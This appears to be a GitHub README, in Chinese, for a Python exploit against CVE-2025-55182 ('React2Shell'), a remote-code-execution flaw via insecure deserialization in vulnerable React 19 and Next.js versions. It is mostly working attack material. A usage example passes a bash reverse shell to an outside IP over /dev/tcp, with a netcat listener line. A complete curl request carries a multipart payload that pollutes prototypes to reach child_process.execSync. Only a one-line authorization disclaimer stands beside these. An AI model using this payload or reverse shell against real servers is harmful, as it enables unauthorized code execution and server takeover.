PedroPLCode/CVE-2025-55182_react2shell_exploit.py
GitHub: PedroPLCode/CVE-2025-55182_react2shell_exploit.py
针对 React/Next.js 不安全反序列化漏洞(CVE-2025-55182)的极简 RCE 利用脚本,通过构造恶意 POST 请求在目标服务器上执行任意命令。
Stars: 0 | Forks: 0
## CVE-2025-55182 不安全的反序列化 - RCE
```
React 19.0.0, 19.1.0, 19.1.1, 19.2.0 / Next.js 15.x (with App Router), 16.0.0 - 16.0.6
```
这是一个针对 React2Shell 漏洞 (CVE-2025-55182) 的极简漏洞利用脚本。
它会构造并发送一个精心制作的 multipart/form-data POST 请求
到存在漏洞的 React 应用程序,从而实现远程代码执行。
```
# 用法:
python3 react2shell_exploit.py
# 示例:
python3 react2shell_exploit.py http://10.87.161.17:8080 'bash -i >& /dev/tcp/10.111.0.193/4444 0>&1' OR 'ls -la >&2 && exit 1'
```
你提供的命令将在目标服务器上执行。
```
For reverse shells, ensure you have a listener set up on your local machine
before executing the exploit.
eg. `nc -lvnp 4444`
```
免责声明:请仅在你拥有或获得明确授权测试的系统上使用此脚本。
未经授权
访问计算机系统是非法且不道德的。
```
# data format
0:{"id":1,"data":"value"}
1:{"ref":"$@0"}
```
```
# rce whoami
curl -X POST http://10.87.161.17:8080 -H "Next-Action: x" -H "Content-Type: multipart/form-data; boundary=----X" --data-binary $'------X\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response": {"_prefix":"process.mainModule.require(\'child_process\').execSync(\'whoami >&2 && exit 1\');","_formData": {"get":"$1:constructor:constructor"}}}\r\n------X\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------X--\r\n'
```
标签:Go语言工具, Python, RCE, 威胁模拟, 安全, 无后门, 超时处理, 逆向工具